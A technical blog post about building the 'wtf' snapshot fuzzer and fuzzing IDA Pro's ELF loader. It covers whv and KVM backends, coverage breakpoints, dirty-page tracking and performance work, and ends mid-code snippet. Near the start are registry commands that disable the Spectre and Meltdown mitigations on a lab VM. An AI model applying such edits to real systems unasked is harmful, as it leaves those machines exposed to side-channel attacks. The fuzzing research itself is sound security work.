When I snapshot IDA the CPU is in user-mode, but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user-mode cr3 doesn't contain the part of the page tables that describes kernel-mode (only a few stubs), so there is no valid translation.
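
For context, this is roughly what that arming path looks like; it is a sketch with assumed helper names and signatures (VirtTranslate / PhyWrite here are guesses), not wtf's exact API:

// Sketch only: translate the GVA with the snapshot's user-mode cr3 and patch
// an int3 into the backing physical page. With KVA shadow on, kernel GVAs
// have no valid translation in that cr3 and this step fails.
bool ArmBreakpoint(const Gva_t Gva) {
  Gpa_t Gpa;
  if (!g_Backend->VirtTranslate(Gva, Gpa)) {
    fmt::print("No GVA->GPA translation for {:#x} (KVA shadow?)\n", Gva);
    return false;
  }

  const uint8_t Int3 = 0xcc;
  return g_Backend->PhyWrite(Gpa, &Int3, sizeof(Int3));
}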

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to profile the tool under a specific workload with the Intel VTune Profiler, which is now free. If you have never used it, you really should, as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something, you should also be able to measure the impact of your change.

For example, below is the VTune hotspot analysis report for the following invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

[VTune hotspot analysis screenshot]

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults as we do actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance, it'd be great if you reached out, because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the output below, you can see IDA loading the elf64.dll loader, then initializing the database as well as the b-tree. Then it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled on was using one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that they want coverage for.

It is annoying though, because it means you need to throw those modules into IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though, such as filling the address space with int3s and lazily restoring the original code bytes, leveraging a length-disassembler engine to know the size of instructions. I loved this idea, but I ran into tons of problems with switch tables that embed data in code sections: wtf corrupts them when setting software breakpoints, which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned the idea. The trap flag was awfully slow, and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.
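
As a rough sketch of how such a bitmap can be consumed (this is not wtf's code; Partition_ and RamSize_ are assumed members, and the guest RAM is assumed to be a single region starting at GPA 0 mapped with WHvMapGpaRangeFlagTrackDirtyPages), each bit covers one 4KB page:

// Sketch only: collect the GPAs of dirty pages from the whv dirty bitmap.
std::vector<uint64_t> QueryDirtyGpas() {
  const uint64_t NumberPages = RamSize_ / Page::Size;
  std::vector<uint64_t> Bitmap((NumberPages + 63) / 64);
  std::vector<uint64_t> DirtyGpas;

  if (FAILED(WHvQueryGpaRangeDirtyBitmap(
          Partition_, 0, RamSize_, Bitmap.data(),
          uint32_t(Bitmap.size() * sizeof(uint64_t))))) {
    return DirtyGpas;
  }

  for (uint64_t PageIdx = 0; PageIdx < NumberPages; PageIdx++) {
    const bool Dirty = (Bitmap[PageIdx / 64] >> (PageIdx % 64)) & 1;
    if (Dirty) {
      DirtyGpas.emplace_back(PageIdx * Page::Size);
    }
  }

  return DirtyGpas;
}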

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag before, let's say, a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls, which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interrupt happens, the CPU saves the current context and loads a new one from the task segment, which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked, but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because it is not as precise, but it's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions, I realized that nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism across executions. Intel does support generating a vmexit when the instruction is executed, but this is also not exposed by whv.

I settled for a breakpoint on the function, emulating its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where the non-determinism is coming from, which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues so far, but it might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that the code coverage breakpoints I thought were free were not quite that free. The theory is that they are one-time breakpoints, so you pay their cost only once. This leads to a warm-up cost at the start of the run as the fuzzer discovers the highly reachable sections of code, but over time it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I kept the code coverage breakpoints that hadn't been hit yet in a list. When restoring, I would start by restoring every dirty page and then iterate through this list to reset the code-coverage breakpoints. It turns out this is highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets the breakpoint both in this copy and in the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty pages and ask the Ram_t class to restore the content of each page. Internally, the class checks if the page has been duplicated and, if so, restores from this copy; if it hasn't, it restores the content from the dump file. This lets us restore code coverage breakpoints at the cost of extra memory:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to exist neither in our cache nor in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the entire RAM. In that case, the guest OS can decide to allocate
  // new memory backed by physical pages that were not dumped because they were
  // not in use by the OS at the time.
  //
  // When this happens, we simply zero-initialize the page, as this is
  // basically the best we can do. The hope is that, if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}
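
To tie this together, here is a minimal sketch of what the dirty-memory restore loop described above could look like. The Dirty_ container and the RestoreDirtyMemory name are assumptions made for illustration, not wtf's actual code:

void RestoreDirtyMemory() {
  //
  // Walk every GPA that was dirtied by the last test case and let Ram_t
  // decide whether to restore it from its breakpoint-patched copy or from
  // the crash-dump. Code coverage breakpoints survive the restore for free.
  //

  for (const Gpa_t DirtyGpa : Dirty_) {
    Ram_.Restore(DirtyGpa);
  }

  Dirty_.clear();
}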

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique, but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This led to wtf corrupting switch-tables with cc's, which made the guest crash in spectacular ways.

I haven't run into this bug with the latest version of IDA yet, which is nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and tracking dirtiness myself when receiving a memory fault caused by a write:

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once that was fixed, I noticed that WHvTranslateGva was also slower than I expected, which is why I emulated its behavior as well by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance than bochscpu. I was honestly a bit disappointed as I had expected more of a 100x improvement, but it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv, so I was eager to see how battle-tested hypervisors like Xen or KVM would measure up.

I didn't know anything about those VMMs, but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API resembling whv via /dev/kvm. This looked perfect because, if it was similar enough to whv, I could probably write a backend for it easily. The KVM API also powers Firecracker, a project that creates micro-VMs to run various workloads in the cloud, so I assumed it would offer the rich features and good performance needed to be the foundation of such a project.

The KVM APIs work very similarly to whv's, so I will not repeat the previous part. Instead, I will just walk you through some of the differences and the things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of a guest GPR, KVM allows you to map a memory region shared with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}
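
As an illustration, and assuming the host advertises KVM_CAP_SYNC_REGS, something along these lines lets you read the GPRs straight out of that shared mapping after KVM_RUN without any extra IOCTL (a sketch, not necessarily how wtf does it):

//
// Ask KVM to mirror the general purpose registers into the shared kvm_run
// mapping around KVM_RUN (requires KVM_CAP_SYNC_REGS).
//

Run_->kvm_valid_regs = KVM_SYNC_X86_REGS;

if (ioctl(Vp_, KVM_RUN, 0) < 0) {
  perror("KVM_RUN");
  return false;
}

//
// The registers are now readable straight out of shared memory.
//

const uint64_t Rip = Run_->s.regs.regs.rip;
fmt::print("rip = {:#x}\n", Rip);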

On-demand paging

Implementing on-demand paging with KVM was very easy. It uses userfaultfd, so you can just start a thread that polls the file descriptor and services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}
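
For reference, here is roughly what the registration side looks like before such a thread can service anything. This is a sketch based on the standard userfaultfd API (the Ram_.Size() accessor is an assumption), not necessarily wtf's exact code:

//
// Create the userfaultfd, handshake the API version, and register the
// guest RAM region for missing-page events.
//

Uffd_ = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (Uffd_ < 0) {
  perror("userfaultfd");
  return false;
}

struct uffdio_api UffdioApi = {.api = UFFD_API, .features = 0};
if (ioctl(Uffd_, UFFDIO_API, &UffdioApi) < 0) {
  perror("UFFDIO_API");
  return false;
}

struct uffdio_register UffdioRegister = {
    .range = {.start = uint64_t(Ram_.Hva()), .len = Ram_.Size()},
    .mode = UFFDIO_REGISTER_MODE_MISSING,
};

if (ioctl(Uffd_, UFFDIO_REGISTER, &UffdioRegister) < 0) {
  perror("UFFDIO_REGISTER");
  return false;
}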

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guest if the hardware supports it. In that case, I can program the PMU to trigger an interrupt after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interrupt called a PMI, which gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalpPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit, and I remember struggling to get the interrupt to fire. I am still not 100% sure that I got the details fully right, but the interrupt triggered consistently during my tests, so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.
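
For the curious, below is a rough sketch of the MSR side of that programming, based on the Intel SDM's fixed-counter definitions; the SetMsr helper is an assumed wrapper that writes a guest MSR, the APIC LVT setup is omitted, and this is not necessarily how wtf does it:

constexpr uint32_t MSR_IA32_FIXED_CTR0 = 0x309;
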